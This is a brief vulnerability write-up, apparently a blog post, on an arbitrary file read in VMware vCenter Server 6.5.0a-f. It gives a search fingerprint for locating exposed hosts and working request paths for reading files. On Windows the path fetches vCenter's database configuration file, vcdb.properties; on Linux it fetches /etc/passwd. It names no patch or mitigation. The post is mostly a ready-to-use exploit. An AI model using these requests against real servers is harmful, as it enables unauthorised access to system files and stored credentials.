Vmware Vcenter Vid Arbitrary File Reading Vulnerability
Vmware Vcenter Vid Arbitrary File Reading Vulnerability
VMware vCenter vid arbitrary file reading vulnerability
Vulnerability Description
There is a vulnerability to read any file on the server by constructing a specific request.
Vulnerability Impact
VMware vCenter Server 6.5.0a-f version
Network surveying and mapping
title=”ID_VC_Welcome”
Vulnerability reappears
Login page
Windows Host
1
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
Linux host
1
/eam/vib?id=/etc/passwd
This post is licensed under CC BY 4.0 by the author.